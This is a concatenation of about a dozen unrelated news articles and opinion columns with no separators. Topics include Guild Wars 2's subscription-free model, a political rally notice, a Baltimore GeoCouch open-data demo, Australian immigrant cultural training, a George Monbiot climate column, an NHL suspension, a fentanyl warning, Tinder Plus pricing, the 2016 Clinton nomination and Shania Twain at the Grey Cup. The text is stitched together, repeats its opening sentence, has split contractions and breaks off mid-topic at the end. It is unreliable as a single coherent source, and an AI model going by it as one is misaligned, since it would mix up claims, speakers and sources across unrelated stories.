You ca n't rely on subscriptions to make a monetarily successful massively multiplayer game , according to ArenaNet global brand manager Chris Lye .
You ca n't rely on subscriptions to make a monetarily successful massively multiplayer game , according to ArenaNet global brand manager Chris Lye .
Guild Wars 2 is continuing the movement of subscription-less gaming with a `` pay to own '' model used by its predecessor Guild Wars , requiring that the user only buy a physical copy of the product to access the full game . And while many developers are still wary of this new model , in today 's climate subscriptions will do more harm than good for the success of a new massively multiplayer game , Lye tells Polygon .
`` I can understand the psychology of somebody who is going to take on the development of an MMO , '' says Lye . `` Taking on the development of an MMO period is risky enough . So people go ' [ W ] ell , we 're putting all the risk into the development of this game , let 's not double-down on our risk and also try to do a whole new business model . '
'For all we know there is a type of game out there that will continue to benefit from a subscription model , I 've just not heard of it yet . '
`` Mentally I can understand that psychology . But I do feel that any developer who wants to be successful in today 's market needs to take a really hard look and say 'Do we really want to use a subscription , is that the best thing for this game ? ' In many cases I do n't think it is . For all we know there is a type of game out there that will continue to benefit from a subscription model , I 've just not heard of it yet . ''
Lye acknowledges that World of Warcraft still approachs massively multiplayer games through the traditional subscription model . While he states there is `` still money to be made '' here for subscription games , in this market the World of Warcrafts of the industry are the exceptions to a relatively new rule . Blizzard and BioWare are beginning to see this industry shift in the form of recent layoffs and drops in subscription numbers . And Star Wars : The Old Republic just this week made the shift from paid to free .
`` If you 're an up and coming business I would definitely advise you do n't naturally assume that subscription model is your business model , '' says Lye . `` Two years ago [ developers ] were all like 'of course it 's going to be a subscription game , why would we think of anything else ? ' and now they 're backpedalling like 'No , no , it 's not necessarily a subscription game , we have n't decided our business model . ' Now there 's an awareness in the industry that requires a serious amount of thought as to whether you will support the subscription business model . The notion of the AAA launch-and-leave type game is declining . There 's much more emphasis on building a long term relationship with the community .
`` I think that any developer who is looking to do an online game and wants to retain a long tail of an online community that they 're going to continue to work with has to seriously consider is subscription the best model or has that really been ridden to death ? A lot of players are telling us 'we do n't want to be locked into a subscription , we want an la carte model of what we spend our money on . ' ''
However , this is still a relatively experimental business model that is experiencing its own transformative period . While many developers rely on microtransactions to offset the cost of the game , this is not a fix-all solution , says Lye . Most users will ignore microtransaction items and studios must be aware of this .
'Some amount of your audience is willing to pay for microtransactions and some of them simply wo n't . '
`` Some amount of your audience is willing to pay for microtransactions and some of them simply wo n't . And that 's okay . As the developer of the game you have to totally respect that . There 's a good portion of the audience that will never pay for microtransactions . But you know what , they add value to the overall game and franchise by being in the game and providing people to party up with and running guilds and adding to the social fabric of the game . So you need to provide ongoing updates for both sets of audiences . ''
And while Lye believes abandoning subscriptions is the road forward , he adds ArenaNet has its concerns regarding whether a subscriptionless environment will make the Guild Wars community more difficult to police .
`` Does the business model incline the community toward a certain negativity ? In the case of Guild Wars 2 that 's definitely been a concern of our community team . Small games with small communities are easier to control and generally they 're better behaved . And the more blockbuster your title goes , you 're more likely to bring in a lot of people you ca n't always control and ca n't always moderate . There 's a relationship between the size of communities . Does free to play naturally blow the size of your community out the door ? It 's definitely a concern . ''
'We do expect the Guild Wars 2 community to be significantly larger than the Guild Wars community . '
ArenaNet expects the Guild Wars 2 community to be `` significantly '' larger than its predecessor , making the concern all the more relevant . However , Lye states it is too early to judge the knock-on effects of this young business model on the upcoming game .
`` It 's definitely something we pay attention to . But without having the experience of having our live community under our belt I 'm hesitant to make any broad statements about that because I want to see how it goes . I can acknowledge we do expect the Guild Wars 2 community to be significantly larger than the Guild Wars community and we will make sure it stays a healthy and helpful community to anyone new to the game . ''
Guild Wars 2 releases to PC August 28th .
MOAR - The Woodstock of American Rallies
Silent Majority To Roar
MOAR , a grassroots movement , announces its first nationwide rally to peacefully unite in honor
of America.You are invited to join with us on September 16 at the National Mall in Washington DC .
Due to increasing political and social unrest , many believe that core American values ,
customs and traditions are being sacrificed . Rally participants will demand protection for
traditional American culture while they express their love for the United States and the
America First agenda . MOAR will send a message to the world that the voices of mainstream
Americans must be heard .
MOAR
we are coming together to send a direct message to Congress , the media
and the world that we stand united not divided to protect and preserve American Culture ”
Event Detais : Opening ceremonies will begin at 11 am EST at the north end of the Mall , near
the Washington monument . Keynote speakers include author Hamody Jasim , Marco Guiterrez founder
of Latinos for Trump , and congressional candidate for California Omar Navarro . The band
Madison Rising is the featured performer . Panel discussions on a number of hot topics are
also planned and much will be happening throughout the day and evening . There will be no
admission charge for any of the events . Further details will be disclosed as the target date
nears .
We are uniting in honor of the United States of America ; all people regardless of race ,
religion , sexual orientation , age or political affiliation are invited . We are gathering to
support our President and our country . We the People , as one Nation under God , invite you to
set aside differences and rally with us .
A lot of my open gov energy of late has been focused on replicating a technique pioneered by Max Ogden ( creator of PDXAPI ) to convert geographic information in shapefile format into an easy-to-use format for developers .
Specifically , Max has pioneered a technique for converting shapefiles into documents in an instance of GeoCouch ( the geographic-enabled version of CouchDB ) .
I was thrilled recently to come across some data for the City of Baltimore and since I know there are some open government developments in the works there , I decided to put together a quick screencast showing how open data – when provided in an easily used format – can form the basis for some pretty useful civic applications .
The screencast below walks through a quick demonstration of an application I wrote in PHP to run on the Tropo platform – it currently supports both IM and Twitter use .
Just send an address in the City of Baltimore to one of the following user accounts along with a hashtag for the type of location you are looking for :
Jabber / Gtalk : baltapi @ tropo.im
Twitter : @ baltimoreAPI
This demo application interacts with a GeoCouch instance I have running in Amazon EC2 – you can take a look at the data I populated it with by going to baltapi.com and accessing the standard CouchDB user interface . I have n't really locked this instance down all that tight , but there really is n't anything in it that I ca n't replace .
Besides , one of the nice things about this technique is how easy it is to convert data from shapefile format and populate a GeoCouch instance . Hopefully others with GIS datasets will look at this approach as a viable one for providing data to developers . ( If anyone has some shapefiles for the City of Baltimore and you want to share them , let me know and I 'll load them into baltapi.com .
There are a number of people in Baltimore pushing for an open data program from their city government , and I have heard that there are some really cool things in the pipeline . I ca n't wait to see how things develop there , and I want to do anything I can to help .
Hopefully , this simple demo will be useful in illustrating both the ease with which data can be shared with developers and the potential benefit that applications built on top of open data can hold for municipalities .
NEW immigrants should be taught about the Australian customs of wearing deodorant and waiting patiently in queues as part of a program to help them come to grips with local culture .
Opposition citizenship spokeswoman Teresa Gambaro has also called for mandatory `` cultural awareness training '' to be taught by employers who are bringing in immigrants for work under programs such as 457 visas .
Ms Gambaro said she was concerned that new immigrants who had come on visas for work were not integrating into the community and that the nation was failing its obligation to teach them how to fit into Australian culture on issues such as health , hygiene and lifestyle .
Read Next
`` Without trying to be offensive , we are talking about hygiene and what is an acceptable norm in this country when you are working closely with other co-workers , '' Ms Gambaro told The Australian .
She said practices such as wearing deodorant and not pushing in when lining up were `` about teaching what are norms in Australia '' . `` You hear reports of people using public transport ( without deodorant ) and I think Australian residents are guilty of this too , '' she said . `` I think we all need to be mindful of our fellow traveller . Sometimes these things are not talked about because people find them offensive but if people are having difficulty getting a job , for instance , it may relate to their appearance and these things need to be taken into account . ''
Ms Gambaro said while her comments could be painted as controversial and would make some people `` most upset '' , she said it was equally important that immigrants were taught about laws , customs and their rights so they were not exploited .
The number of 457 temporary business visas granted was 90,120 last financial year , rivalling the 113,725 visas issued under the government 's priority program for permanent skilled migration .
Ms Gambaro 's comments came a day after Coalition immigration spokesman Scott Morrison told The Australian temporary immigrants were not integrating into the broader Australian community . Mr Morrison said the government 's multicultural strategy was failing because it was too obsessed with `` symbolism '' and government-funded English language courses were not teaching immigrants properly .
The Immigration Minister , Chris Bowen , yesterday hit back at Mr Morrison 's criticism of multicultural policy . `` It 's a bit rich for Mr Morrison , who has previously said he does n't like the word 'multiculturalism ' , to now be criticising a landmark policy to further strengthen our multicultural programs and help to ensure government services respond to the needs of migrant and refugee communities , '' a spokesman for Mr Bowen said .
`` It is bizarre for Mr Morrison to say there should be more language support for temporary migrants when it is he who has consistently said the English-language requirement for incoming temporary migrants is too hard .
`` He should know that English-language testing is a key component for the vast majority of temporary-visa application requirements to help ensure a smooth transition into Australia . ''
In February last year , Mr Bowen announced changes to the government 's multiculturalism strategy , including beefing up the Australian Multicultural Council , which will now act as a `` champion for multiculturalism '' and advise the government on how best to direct services to new migrants . The government also established a `` national anti-racism and partnership strategy '' .
But Ms Gambaro said cultural awareness training was desperately needed for immigrants to help them enjoy life in Australia more fully . `` The detail of this has to be worked out -- whether it 's included as part of a visa charge for certain industries or done through a labour-hire firm , '' she said , adding there were going to be problems as more workers arrived in Australia . `` You are going to have a whole pile of people coming in , '' she said . `` If you 're a mining company you 'll have a whole pile of people coming in from India or China or anywhere else you need to have socially skilled workers .
`` It 's not just about having bodies in the workplace . If they are going to have a good experience working for us here in Australia they need to have cultural awareness and socially skilled workers as well as being work-skilled workers .
`` They need to teach what the local laws are here , what is acceptable in a tenancy arrangement . All of this should be included . It should be about lifestyle , health and hygiene . It 's how to fit into Australian society . ''
She said people living in Australia for years on end needed to be aware of the cultural norms .
`` We do this sort of stuff on a very limited basis when we send troops over to Afghanistan and Iraq , '' she said .
`` We put them through cultural awareness training ; we need to do the same when they come into Australia because they will have a better experience .
`` We think that people know what the norms here are , but they do n't and sometimes it does cause a considerable amount of angst . You just can not have hundreds of thousands of people coming into a country without this , you 're going to have issues . ''
She pointed to an example of a man on a working visa going to hospital with his heavily pregnant wife only to learn that they were not obliged to deliver her baby . `` There are cases like that where people are n't aware of what their health entitlements are . He was very distressed when he contacted our office , '' she said .
Produce More , Consume Less
How our governments ' crashing contradictions destroy their climate policies .
By George Monbiot , published on the Guardian 's website , 8th January 2015 .
As you read this , a monster of a bill is passing smoothly and quietly through Britain 's parliament . It 's so big and complex , and covers so many topics , that it makes a mockery of democracy .
The Infrastructure Bill epitomises the rising trend of legislation-stuffing : cramming so many unrelated issues into one bag that parliamentary votes become meaningless . MPs must either accept this great bundle of unrelated measures in its entirety or reject it in its entirety . So laws can pass which no one in their right mind would have voted for .
Bills like this are good places for burying bad news , and this one is a graveyard .
Among its outrageous and scarcely-debated provisions , slipped in by the government some time after parliamentary debates began , is a measure that undermines every claim it has made about preventing dangerous climate change . It is a legal obligation on current and future governments to help trash the world 's atmosphere .
The government already has a legal obligation to do the opposite . The Climate Change Act 2008 , supported by all the major parties , commits successive governments to minimise the UK 's greenhouse gas emissions . The Infrastructure Act 2015 will commit successive governments to maximise them .
Needless to say , that 's not quite how it is expressed . The bill obliges governments to produce strategies for “ maximising the economic recovery of UK petroleum ” : in other words for getting as much oil out of the ground as possible . Oil is extracted to be burnt ; burning it releases greenhouse gases ; maximising recovery means maximising greenhouse gases .
The Infrastructure Act , if passed – and so far it is scarcely being contested ( hello Labour , do you still exist ? ) – is the Climate Change Act 's evil twin . Both acts oblige current and future governments to report at fixed periods on how they will achieve their contradictory objectives . The same person , the secretary of state for energy and climate change , will be responsible for both policies : ensuring that the UK both consumes less oil and produces more . Perhaps he 'll seek to minimise climate change by day , then , after a stiff dose of potion , come out at night to maximise it .
But there could not be a greater contrast between the ways in which the two acts ( or their relevant clauses ) were developed . The Climate Change Act was the result of a massive campaigning effort , over many years , by citizens ' movements that mobilised public opinion and pressed MPs to act on it . The provisions in the Infrastructure Bill were slipped surreptitiously into the back of a legislative juggernaut that was already rolling down a six-lane motorway . In other words , the first act was an example of how democracy is supposed to work ; the second is an example of how it gets corrupted .
Now , on the day that MPs sit down in committee to discuss this bill , Nature publishes the most detailed scientific paper yet on how much fossil fuel should be left in the ground if we 're to have a chance of preventing more than two degrees of global warming .
To deliver a 50 % probability ( which is not exactly reassuring ) of no more than 2° of warming this century , the world would have to leave two-thirds of its fossil fuel reserves unexploited .
I should point out that reserves are just a small fraction of resources ( which means all the minerals in the Earth 's crust ) . The reserve is that proportion of a mineral resource which has been discovered , quantified and is viable to exploit in current conditions : in other words that 's good to go .
The Nature paper estimates that a third of the world 's oil reserves , half its gas reserves and 80 % of its coal reserves must be left untouched to avert extremely dangerous levels of global warming . Two degrees is dangerous enough ; at present we are on course for around five by the time the century ends , with no obvious end in sight beyond 2100 .
The only sensible response to such findings , which some of us have been advocating for years , is a global agreement to leave these unburnable fossil fuels in the ground . But it 's not just that no such agreement exists , no such agreement has ever been mooted .
Researching Do n't Even Think About It , which I see as the most important book published on climate change in the past few years , George Marshall discovered that there has not been a single proposal , debate or even position paper on limiting fossil fuel production put forward during international climate negotiations .
“ From the very outset fossil fuel production lay outside the frame of the discussions and , as with other forms of socially constructed silence , the social norms among the negotiators and policy specialists kept it that way . ”
I would guess that it is not altogether inconvenient for governments to ignore the role of fossil fuel companies in causing climate change .
While most states have not taken the astonishing , ecocidal step of making it a legal obligation , almost all are pursuing the same policy as the United Kingdom : maximising the production of fossil fuels . And almost all pay lip service to the idea of minimising greenhouse gas emissions .
There is no attempt to resolve this contradiction , or even to acknowledge it . They do n't have to . They know that it will resolve itself . If the stuff keeps coming out of the ground , it will be burnt , without regard to the feeble policies seeking to limit its consumption .
I believe I might have been the first person to suggest in the media that the best means of addressing climate change is to leave fossil fuels in the ground , in a Guardian column in 2007 . Since then , this solution has been championed by the indefatigable Bill McKibben , through his Do the Math tour and 350.org , and it has been picked up by many other organisations .
But still our politicians pretend not to hear . Even the current secretary of state for energy and climate change in the UK , Ed Davey , who is often fairly responsive , blocks his ears and sings loudly when the crashing contradictions in his role are mentioned . Otherwise , how could he creep out at night to reverse the policies he pursues by day ? Like Dr Jekyll , he could not live with himself if he was fully aware of what Mr Hyde was doing .
Were the world 's governments to regulate the wellhead rather than just the tailpipe , logistically the task would be a thousand times easier . Instead of trying to change the behaviour of 7 billion people , they would need to control just a few thousand corporations .
These companies would buy permits to extract fossil fuels in a global auction . As a global cap on the amount of fossil fuel that could be burnt came into force , the price would rise , making low carbon technologies , such as wind , solar and nuclear , much better investments . The energy corporations would then have no choice but to start getting out of dirt and into clean technologies . The money from the auction could be used either to compensate poorer nations for not following us down the coal hole or to help them survive in a world in which some dangerous warming – but hopefully no more than 2° – will inevitably occur .
For 23 years , governments have been wasting precious time by pursuing an unworkable solution . Perhaps that was their intention . But if the climate talks in Paris in December are to have any meaning or purpose , they should abandon the self-defeating policy of addressing only consumption , and concentrate on restricting production . This , I believe should be the focus of our campaigns . Through groups like 350.org , we must make this such a potent electoral issue that we drag governments out of the clutches of the fossil fuel industry .
You think that 's tough ? Well try the alternative : living in a world with 5° of global warming , in other words a world of climate breakdown . By comparison , almost anything looks easy .
www.monbiot.com
You 're bound to find the Stephen A. Smith 's and Tony Kornheiser 's of the world going crazy today about situations like the Brent Seabrook hit on David Backes in Game 2 of their NHL Playoff matchup . At this very moment I 'm not very concerned about the deep philosophical and medical implications of this situation and whether or not anyone is a bad person because of it . Let 's look at this in a practical way and see how this REALLY affects the series , in which the St. Louis Blues now hold a 2-0 series lead .
I mean it has to be done , so here is the hit . Take a look in full speed and slow motion and try to stay calm if you 're a hockey fan , especially a Blues fan .
First , Seabrook is going to be suspended . Here is the excerpt from the 2013-14 NHL Rulebook , which highlights this section in an ominous red…
Rule 48 – Illegal Check to the Head
48.1 Illegal Check to the Head – A hit resulting in contact with an opponent 's head where the head was the main point of contact and such contact to the head was avoidable is not permitted . In determining whether contact with an opponent 's head was avoidable , the circumstances of the hit including the following shall be considered :
( i ) Whether the player attempted to hit squarely through the opponent 's body and the head was not “ picked ” as a result of poor timing , poor angle of approach , or unnecessary extension of the body upward or outward .
( ii ) Whether the opponent put himself in a vulnerable position by assuming a posture that made head contact on an otherwise full body check unavoidable . SECTION 6 – PHYSICAL FOULS
( iii ) Whether the opponent materially changed the position of his body or head immediately prior to or simultaneously with the hit in a way that significantly contributed to the head contact .
The question is , how long will Seabrook be suspended.1 Take a look at a cursory breakdown of suspensions for boarding and hits to the head in the regular season and playoffs over the last 5 years here.2
This is by no means conclusive because of the small sample sizes , but there is a definite trend in suspensions being drastically lower in the playoffs except for the most egregious of hits , which skew the results . Based on this , Seabrook is likely looking at a 1-2 game suspension , with three representing a distinct but harsh possibility .
Now let 's look at this based solely on what effect all this has on the ice . Seabrook , a first pairing defenseman with a solid all-around game and underrated contributions is likely done for a few games . David Backes , the Blues team captain , third-leading scorer and first-line center could be sidelined for significantly longer .
There is no doubting Backes 's toughness , but there is increased awareness on concussions in the NHL for obvious reasons . The Blues may feel pressure from the NHLPA or the NHL to put Backes through all the steps thoroughly before allowing him to return .
This is an advantage for the Blackhawks , despite the loss of one of their top blue liners . Seabrook is the fourth defenseman in penalty kill time on ice for the Blackhawks , meaning he 's the last regular penalty kill defenseman . This will push up a player to the PK unit that normally does n't play more than 30-40 seconds per game on the penalty kill .
There is one more place where the loss of Seabrook is truly going to hurt , blocked shots . Seabrook is number two on Chicago in blocked shots with 142 . Blackhawks netminder , Corey Crawford , is going to face more shots in the next couple games because fewer will be knocked down before getting to him .
The loss of Backes does n't just hurt the Blues during even strength play , he was tied for 13th in the league and leads the Blues in power play goals ( 10 ) , despite being just fifth on the team in power play time on ice per game .
A surprising combination of stats will need to be made up for in Backes 's absence as well . Few players are both big hitters and face-off machines . Backes leads the team in percentage of face-offs taken ( 27 % ) , not surprising being he is the first-line center , and hits ( 273 ) . To put the checks into perspective , his 273 checks ranks him third in the league . The loss of Backes is going to open up some lanes for the Blackhawks talented skaters either through more freedom to hold onto the puck or through less talented hitters trying to make up for the lack of Backes , opening up passing lanes right before the check .
With a 2-0 advantage in the series already , the Blackhawks will need to have a good showing at home . The loss of a captain is worse than the loss of a first-pairing defenseman , but neither is going to be easily dealt with . If the Blues can take advantage of the extra shooting lanes without Seabrook in the lineup , they could pepper Crawford with shots and take commanding control of this series with three wins , even if Chicago takes one at home .
The Blackhawks could take advantage of what will feel like a larger ice surface without Backes out there . Their crisp passing and creative play could flourish on the first-line now that the best two-way forward on that line will likely be out or , at the very least , much less effective over the next few games .
If there is a three next to the Blues before returning home for game 5 , they should n't have much trouble closing the series out .
UPDATE
Brent Seabrook gets a three-game suspension for his hit on David Backes . — Chris Johnston ( @ reporterchris ) April 20 , 2014
One more than expected , and quite possibly the rest of this series . The extent of Backes 's injury has yet to be seen .
Drug users in London are being warned that the potentially lethal opioid fentanyl is showing up in other drugs , specifically heroin and marijuana .
Fentanyl is an opioid that 's between 50 and 100 times more powerful than morphine . It 's now available in powder form similar to cocaine , according to the Middlesex London Health Unit .
`` In testing done during the last week of July , we detected fentanyl in the urine of people who told us they were n't even using it . It seems dealers are adding it to other drugs , '' said Dr. Ken Lee , with the Addiction Services of Thames Valley .
`` Users are probably not getting what they think they 're getting and someone is going to die from this . ''
Urine tests conducted this week at ADSTV `` detected fentanyl in people who reported using only heroin and in others who reported only smoking marijuana , '' according to a release from the MLHU .
The health unit , Canadian Mental Health Association , ADSTV and London police are issuing an alert warning people in London of the findings .
`` Finding fentanyl in drugs like marijuana means that people who think they are doing something minor may end up dying of overdose , '' said MLHU Medical Officer of Heath Chris Mackie .
`` I do n't think anyone is really ready for a wave of overdose deaths in our community , '' said Mackie . `` We 've done a good job of getting naloxone out to many partners but there 's a lot more work to do . ''
The MLHU is asking people who use illicit drugs to carry a Naloxone Kit and not use drugs alone .
Layers of Fear is a new horror game about the darkness at the heart of great artworks .
Hailing from Bloober Team , which unfortunately has a rocky record to date , Layers of Fear is headed to PC on August 27 .
Described as “ a psychedelic horror game where each turn of the camera may change the look of your surroundings ” , this creepy-seeming affair has players exploring a constantly-shifting house as they “ delve deep into the mind of an insane painter ” .
“ Layer by layer uncover the visions , fears and horrors that entwine the protagonist and finish the masterpiece he has strived so long to create , ” Bloober said .
The project was inspired by masterpiece paintings across several centuries , and the setting draws in influences from 19th-century architecture and decor . Take a look at the teaser trailer and screenshots below .
“ Pharaoh , let my people go ! ”
“ Forget it . And if you quit bugging me I 'll give you some cash to go away , ” replied Pharaoh .
“ You got it , ” said Moses .
Ok , so that 's not exactly how the story goes . In Exodus , Moses actually voluntarily forfeits a life of luxury and power for the freedom of his people .
Too bad Moses did not represent the citizens of Missouri .
Earlier this year , the Missouri legislature took up the issue of forced unionization . Federal law allows unions to force workers into their ranks and extract money from their pockets unless the state in which those workers reside pass a so-called right-to-work law , which allows workers to opt out of union membership and dues .
Of course , unions hate these laws . And no wonder -- workers have been fleeing the suffocating embrace of Big Labor for decades , and it is only through government enforced mandatory membership that union bosses keep the meager number of captives they still have .
The Missouri legislature took up a right-to-work bill last session . Unfortunately , the Democratic Governor Jay Nixon vetoed it . The legislature will assemble again on September 16th for a veto session , and an override of Nixon 's right-to-work rebuke will be likely among its first priorities .
An override would be a fait-accompli – if the Republican members held firm for worker freedom .
Ordinarily of course such representatives could be counted on to do so . Republicans have historically championed right-to-work laws as a necessary condition of American liberty . In fact , if you look at a map of the 25 right-to-work states and superimpose it over a map of states with Republican-controlled governments , they are almost as one .
But there are lawmakers in Missouri – Republican lawmakers – who voted against giving workers these freedoms last session , and by all accounts intend to do so again in the veto session .
Why would they do this ?
The Center for Worker Freedom found the answer , though it was not hard to guess . Many of these members who voted against their citizens , their party , and the very foundation of American liberty also receive significant union support , either endorsements or campaign contributions or both .
Representative Linda Black for example , voted 'no ' on right-to-work . And she received over $ 20,000 from trade unions .
What a shock .
What these Republican legislators who betrayed their principles and their party and sold worker freedom for campaign cash perhaps do not know is this : The donor class in Missouri , the members of which have given millions to the state GOP over the years , are furious that their money has yielded such cowardice .
Right now these legislators love their union money more than they fear the wrath of their party faithful .
Any guesses as to how that will turn out ?
In addition , these Republican legislators are deeply offending socially conservative voters in Missouri . The Big Labor machine they are kow-towing to are big funders of , among other things , Planned Parenthood .
For example , as Fox News reported this summer , “ AFSCME … paid Planned Parenthood 's political action wing $ 400,000 in 2014 , $ 20,000 in 2013 and $ 20,000 in 2011 . ”
In light of the recent revelations of Planned Parenthood personnel cavalierly trading in infant corpses , many Missourians are outraged . And among the outraged is apparently Representative Linda Black , who recently switched parties from Democrat to Republican in part because…
“ …she finds it ‘ difficult to square my social and moral beliefs ' with those of the Democratic Party . As an example , Black has frequently voted with majority Republicans in support of abortion restrictions. ” ( KMBC- Kansas City , Nov. 5 , 2014 )
This is the same Linda Black receiving tens of thousands from unions .
Maybe Black can argue to her socially conservative constituents that she 's doing a service ; that if she was n't taking money from these unions they would just give it to Planned Parenthood .
But I do n't think that is going to fly .
Matt Patterson is a Executive director of The Center for Worker Freedom , a special project of Americans for Tax Reform .
Mpatterson.column @ gmail.com
Tinder 's “ Rewind ” functionality just went live , finally giving users the ability to go back in time and swipe right instead of left .
The “ Rewind ” feature is included in the premium tier of the service , Tinder Plus , which was unveiled today and costs anywhere between $ 9.99 and $ 19.99 in the United States , depending on the age of the user . That 's right . Tinder Plus costs $ 19.99 for users older than 30 , while it costs just $ 9.99 for folks who are younger than 30 .
However , in the TechCrunch office we 've seen Tinder Plus offered at the price of $ 14.99/month for a 30+ female user . We 've reached out to Tinder to get a clearer picture of the Tinder Plus pricing structure and will update as soon as we know more .
For now , however , we do know that pricing not only ranges based on age but by location . Users in emerging countries ( Tinder is currently available in 140 countries across the globe ) will pay as little as $ 2.99/month , while users older than 28 in developed markets like the UK will be paying approximately $ 23/month ( and nearly 4x as much as their over 28-year-old counterparts ) .
Tinder has been testing pricing in various markets for the past few months , but even without the complete information , it 's easy to get an idea of the general landscape here . Older users , who theoretically have less supply and offer less demand , should pay a greater amount for extra dating tools . Plus , they likely make more money than younger users .
It 's Uber 's Surge pricing model applied to romantic endeavors .
Tinder Plus also includes Passport , which allows users to search for matches anywhere in the world through the drop of a pin , as opposed to being locked into your current location .
Tinder Plus also allows users to buy themselves out of advertisements , though Tinder has yet to launch any ad products just yet . Sources say that the ad product will launch later this month , but it 's unclear what exactly those ads will look like .
As for the features launching today , they make a lot of sense given the current user behavior on Tinder . Rewind , in particular , appeals to just about anyone who has swiped left when they meant to swipe right .
The company has seen over 6 billion matches in total , though it 's hard to say how many of those matches become anything . That 's not necessarily a bad thing for Tinder . The point is that it has become an addiction , with people mindlessly flipping through potential suitors and swiping based on a gut reaction .
It 's only natural to accidentally swipe left when you meant to swipe right , and when the stakes can feel as high as potentially throwing away your next boyfriend or girlfriend , the question is n't whether or not people will pay but simply how much .
Other features like Passport appeal to a more engaged user , one who has gotten good at making Tinder work for them and could use the added functionality while traveling . You know , to plan ahead .
If you want to check out Tinder Plus , you can see a CNN interview with CEO Sean Rad right here or visit the Tinder blog for more information .
Please enable Javascript to watch this video
Hillary Clinton claimed her place in history Tuesday as America 's first female presumptive presidential nominee but rival Bernie Sanders is refusing to drop his bid despite overwhelming odds .
The former secretary of state immediately pivoted from her victory to a full bore assault on the presumptive Republican nominee Donald Trump and made a sweeping effort to reach out to Sanders supporters in an attempt to unify Democrats .
But hours after Clinton 's euphoric victory rally in Brooklyn , Sanders spoke before a roaring crowd of his own in California to declare `` the struggle continues . '' The Vermont senator pledged to stay in the race through next week 's primary in Washington , D.C. , and to fight on for social , economic , racial and environmental justice at the Democratic National Convention in Philadelphia .
But he did not specifically commit to pursuing his fight for the nomination at the convention , leaving his ultimate intentions unclear .
Obama 's call
President Barack Obama , who waited until voting ended in the last six primary states to weigh in on the race , called both candidates to congratulate them for `` running inspiring campaigns that have energized Democrats , '' according to a White House statement .
But the President , who will meet with Sanders Thursday at the Vermont senator 's request , clearly sided with Clinton by lauding her for `` securing the delegates necessary to clinch the Democratic nomination for President . ''
`` Her historic campaign inspired millions and is an extension of her lifelong fight for middle-class families and children , '' the statement said .
Reaching the highest peak yet in a tumultuous and trailblazing political career , Clinton claimed victory exactly eight years after folding her 2008 Democratic primary campaign against Obama .
`` Thanks to you , we 've reached a milestone , '' she said during a speech in Brooklyn . `` Tonight 's victory is not about one person . It belongs to generations of women and men who struggled and sacrificed and made this moment possible . ''
Her long-awaited moment of celebration came as she notched wins in the night 's primaries in California , New Jersey , South Dakota and New Mexico Democratic primaries , according to CNN projections .
Clinton took the stage in Brooklyn to an explosion of cheers from her crowd , in the kind of eruption of enthusiasm that has been fleeting during much of her campaign . Clearly delighted , she stood with her arms outstretched on stage , savoring the adulation .
Reaching out to Sanders supporters , Clinton praised the Vermont senator for his long public service and mirrored some of his progressive economic rhetoric . She played down any notion of divisions and said their vigorous primary campaign was `` very good for the Democratic Party and for America . ''
But in a sign of the task she faces in uniting the party , Sanders supporters loudly booed her name when he said he had received a `` gracious '' call from his rival and said he had congratulated her on her victories on Tuesday .
Sanders confounded the notion that the end of the state primary races would mean the end of his campaign .
`` Next Tuesday , we continue the fight in the last primary in Washington DC , '' Sanders said . `` We are going to fight hard to win the primary in Washington , D.C. , and then we take our fight for social , economic , racial and environmental justice to Philadelphia . ''
`` I am pretty good at arithmetic and I know that the fight in front of us in a very , very steep fight . ''
But Sanders vowed to fight on for every delegate and every vote .
Clinton vs. Trump
While Sanders signaled that he was not yet ready to fold a campaign that started with him as a fringe candidate and ignited a startling grass roots uprising that won more than 10 million votes , Clinton looked ahead to the general election .
Clinton intensified her assault on Trump , laying out a case that his values and rhetoric are incompatible with American principles and that he 's `` temperamentally unfit '' to be President .
`` He is not just trying to build a wall between America and Mexico . He is trying to wall of Americans from each other . When he says let 's make America great again , that is code for let 's take American backwards . ''
She hit Trump hard for his recent attacks on a judge with Mexican ancestry along with mocking a disabled reporter and calling `` women pigs . ''
`` He wants to win by stoking fear and rubbing salt in wounds and reminding us daily just how great he is . ''
Clinton also signaled a robust challenge to Trump resonating with gender and personal themes . She spoke of how her late mother , Dorothy Rodham , taught her `` never to back down from a bully . ''
Sanders faces an existential campaign question . He is grappling with whether to honor his vow to fight on to the Democratic National Convention next month or accept the electoral mathematics that give him no viable path to victory and join Clinton to unite a party divided by a much more competitive primary race than expected .
CNN 's Brianna Keilar reported that the campaign managers for Clinton and Sanders are in touch , keeping the lines of communication open so they can eventually unify the party , according to a source familiar with the conversations .
The New York Times reported the Sanders campaign is about to undergo a significant reduction in staff . A top campaign official would neither confirm nor deny the report to CNN . But notably , as the campaign reaches the end of the primary season , the campaign has not moved to staff key battleground states and little appears in the works beyond recent promises to fight to the convention .
Trump 's controversy
For Trump , the question Tuesday was how he would extricate himself from the political hole opened up by his controversial comments about a judge of Mexican descent who is overseeing a lawsuit aimed at Trump University . His accusation that the judge is biased because of his ethnicity has horrified senior GOP leaders who recently reluctantly endorsed him . He tried to neutralize the furor with a statement Tuesday saying his comments had been `` misconstrued . ''
Amid the furor , Trump , who won the Republican contests Tuesday , delivered a more conventional speech that seemed a departure from the free wheeling approach he often takes . Using a teleprompter -- notable for someone who has blasted Clinton for being scripted -- Trump attacked Clinton and called for GOP unity . For one night at least , it seemed that the unpredictable billionaire had heeded calls by the GOP establishment -- which he built a campaign on vilifying -- to rein himself in for the good of the party .
`` We are only getting started and it is going to be beautiful , '' he said .
He did n't mention the judge during his speech and instead sought to convey that he understood his new role as the leader of the GOP .
`` I understand the responsibility of carrying the mantle and I will never , ever let you down , '' he said .
A top campaign adviser told CNN 's Jim Acosta that Trump 's speech was `` very important to recovering from these five bad days . ''
Please enable Javascript to watch this video
[ van id= '' politics/2016/06/08/hillary-clinton-milestone-sot.cnn '' ]
“ Man , I feel like a Canadian ! ”
That 's what Shania Twain exclaimed towards the end of her halftime show at the Grey Cup in Ottawa on Sunday .
After all , it does n't get much more Canadian than riding in on a dogsled , before being greeted and escorted on stage by some mounties . Oh , in the snow , too .
It was the most Canadian entrance of all-time .
. @ ShaniaTwain just entered the # GreyCup halftime show on a dogsled . Tune in to @ CFLonTSN now to catch the show ! pic.twitter.com/JOcgFzox3X — TSN ( @ TSN_Sports ) November 27 , 2017
Dressed in a red fur coat , the Canadian country music star was the perfect choice for the occasion , as the Calgary Stampeders and Toronto Argonauts battle it out for the right to lift the Grey Cup .
The CFL does n't always get it right – the Black Eyed Peas ' performance at the Grey Cup in Vancouver in 2005 comes to mind – but they did this year . The Grey Cup goes great with little dose of Canadiana .
See also
The City of Langford has announced the addition of four new RCMP officers to its detachment this year .
